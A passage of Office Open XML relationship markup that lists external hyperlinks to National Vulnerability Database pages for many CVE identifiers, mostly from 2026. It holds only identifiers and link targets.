Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75706" TargetMode="External" Id="rId4948" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75707" TargetMode="External" Id="rId4949" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75708" TargetMode="External" Id="rId4950" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75709" TargetMode="External" Id="rId4951" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75710" TargetMode="External" Id="rId4952" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75711" TargetMode="External" Id="rId4953" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75712" TargetMode="External" Id="rId4954" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75713" TargetMode="External" Id="rId4955" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75714" TargetMode="External" Id="rId4956" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75715" TargetMode="External" Id="rId4957" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75716" TargetMode="External" Id="rId4958" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75717" TargetMode="External" Id="rId4959" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75718" TargetMode="External" Id="rId4960" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75719" TargetMode="External" Id="rId4961" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75720" TargetMode="External" Id="rId4962" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75722" TargetMode="External" Id="rId4963" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75724" TargetMode="External" Id="rId4964" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75725" TargetMode="External" Id="rId4965" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75727" TargetMode="External" Id="rId4966" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75729" TargetMode="External" Id="rId4967" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75730" TargetMode="External" Id="rId4968" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75731" TargetMode="External" Id="rId4969" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75733" TargetMode="External" Id="rId4970" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75734" TargetMode="External" Id="rId4971" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75735" TargetMode="External" Id="rId4972" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75736" TargetMode="External" Id="rId4973" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75737" TargetMode="External" Id="rId4974" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75738" TargetMode="External" Id="rId4975" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75739" TargetMode="External" Id="rId4976" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75740" TargetMode="External" Id="rId4977" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75741" TargetMode="External" Id="rId4978" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75742" TargetMode="External" Id="rId4979" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79418" TargetMode="External" Id="rId4980" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79640" TargetMode="External" Id="rId4981" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79905" TargetMode="External" Id="rId4982" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81888" TargetMode="External" Id="rId4983" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81890" TargetMode="External" Id="rId4984" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82396" TargetMode="External" Id="rId4985" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84330" TargetMode="External" Id="rId4986" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84371" TargetMode="External" Id="rId4987" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84385" TargetMode="External" Id="rId4988" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85133" TargetMode="External" Id="rId4989" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85418" TargetMode="External" Id="rId4990" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86483" TargetMode="External" Id="rId4991" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87025" TargetMode="External" Id="rId4992" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87033" TargetMode="External" Id="rId4993" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87037" TargetMode="External" Id="rId4994" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87048" TargetMode="External" Id="rId4995" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87107" TargetMode="External" Id="rId4996" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87445" TargetMode="External" Id="rId4997" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87458" TargetMode="External" Id="rId4998" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87462" TargetMode="External" Id="rId4999" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87484" TargetMode="External" Id="rId5000" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87496" TargetMode="External" Id="rId5001" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87501" TargetMode="External" Id="rId5002" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87507" TargetMode="External" Id="rId5003" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87540" TargetMode="External" Id="rId5004" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87571" TargetMode="External" Id="rId5005" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87575" TargetMode="External" Id="rId5006" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87583" TargetMode="External" Id="rId5007" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87599" TargetMode="External" Id="rId5008" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87615" TargetMode="External" Id="rId5009" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87635" TargetMode="External" Id="rId5010" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87645" TargetMode="External" Id="rId5011" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87649" TargetMode="External" Id="rId5012" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87653" TargetMode="External" Id="rId5013" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87655" TargetMode="External" Id="rId5014" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87656" TargetMode="External" Id="rId5015" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2021-43718" TargetMode="External" Id="rId5016" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-51011" TargetMode="External" Id="rId5017" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-51016" TargetMode="External" Id="rId5018" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-54394" TargetMode="External" Id="rId5019" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-54395" TargetMode="External" Id="rId5020" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-3653" TargetMode="External" Id="rId5021" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-15691" TargetMode="External" Id="rId5022" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11446" TargetMode="External" Id="rId5023" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12215" TargetMode="External" Id="rId5024" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12956" TargetMode="External" Id="rId5025" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12962" TargetMode="External" Id="rId5026" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14350" TargetMode="External" Id="rId5027" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14562" TargetMode="External" Id="rId5028" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15141" TargetMode="External" Id="rId5029" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15461" TargetMode="External" Id="rId5030" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15588" TargetMode="External" Id="rId5031" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15937" TargetMode="External" Id="rId5032" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16660" TargetMode="External" Id="rId5033" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17264" TargetMode="External" Id="rId5034" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17517" TargetMode="External" Id="rId5035" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18042" TargetMode="External" Id="rId5036" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18736" TargetMode="External" Id="rId5037" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18750" TargetMode="External" Id="rId5038" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19032" TargetMode="External" Id="rId5039" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19614" TargetMode="External" Id="rId5040" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19625" TargetMode="External" Id="rId5041" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19670" TargetMode="External" Id="rId5042" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19733" TargetMode="External" Id="rId5043" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20503" TargetMode="External" Id="rId5044" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20504" TargetMode="External" Id="rId5045" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-23930" TargetMode="External" Id="rId5046" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27463" TargetMode="External" Id="rId5047" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33219" TargetMode="External" Id="rId5048" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33247" TargetMode="External" Id="rId5049" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33389" TargetMode="External" Id="rId5050" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33391" TargetMode="External" Id="rId5051" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-34959" TargetMode="External" Id="rId5052" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-34967" TargetMode="External" Id="rId5053" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-37067" TargetMode="External" Id="rId5054" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38819" TargetMode="External" Id="rId5055" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-39835" TargetMode="External" Id="rId5056" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-40509" TargetMode="External" Id="rId5057" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-41606" TargetMode="External" Id="rId5058" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42338" TargetMode="External" Id="rId5059" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-43002" TargetMode="External" Id="rId5060" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44254" TargetMode="External" Id="rId5061" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44255" TargetMode="External" Id="rId5062" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44256" TargetMode="External" Id="rId5063" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45125" TargetMode="External" Id="rId5064" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45292" TargetMode="External" Id="rId5065" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45705" TargetMode="External" Id="rId5066" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45734" TargetMode="External" Id="rId5067" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46405" TargetMode="External" Id="rId5068" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46482" TargetMode="External" Id="rId5069" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47680" TargetMode="External" Id="rId5070" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47720" TargetMode="External" Id="rId5071" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48077" TargetMode="External" Id="rId5072" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48078" TargetMode="External" Id="rId5073" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48094" TargetMode="External" Id="rId5074" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48796" TargetMode="External" Id="rId5075" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49392" TargetMode="External" Id="rId5076" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-4945" TargetMode="External" Id="rId5077" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50159" TargetMode="External" Id="rId5078" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50554" TargetMode="External" Id="rId5079" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52732" TargetMode="External" Id="rId5080" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52734" TargetMode="External" Id="rId5081" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52737" TargetMode="External" Id="rId5082" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53458" TargetMode="External" Id="rId5083" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53497" TargetMode="External" Id="rId5084" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53569" TargetMode="External" Id="rId5085" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53585" TargetMode="External" Id="rId5086" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53654" TargetMode="External" Id="rId5087" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54048" TargetMode="External" Id="rId5088" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54084" TargetMode="External" Id="rId5089" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54338" TargetMode="External" Id="rId5090" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54494" TargetMode="External" Id="rId5091" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54741" TargetMode="External" Id="rId5092" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54766" TargetMode="External" Id="rId5093" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54909" TargetMode="External" Id="rId5094" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55090" TargetMode="External" Id="rId5095" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55106" TargetMode="External" Id="rId5096" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55419" TargetMode="External" Id="rId5097" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55512" TargetMode="External" Id="rId5098" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55619" TargetMode="External" Id="rId5099" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55624" TargetMode="External" Id="rId5100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55777" TargetMode="External" Id="rId5101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55867" TargetMode="External" Id="rId5102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56704" TargetMode="External" Id="rId5103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61632" TargetMode="External" Id="rId5104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61711" TargetMode="External" Id="rId5105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62291" TargetMode="External" Id="rId5106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63435" TargetMode="External" Id="rId5107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64654" TargetMode="External" Id="rId5108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64857" TargetMode="External" Id="rId5109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65841" TargetMode="External" Id="rId5110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65932" TargetMode="External" Id="rId5111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65933" TargetMode="External" Id="rId5112" /><Relationship 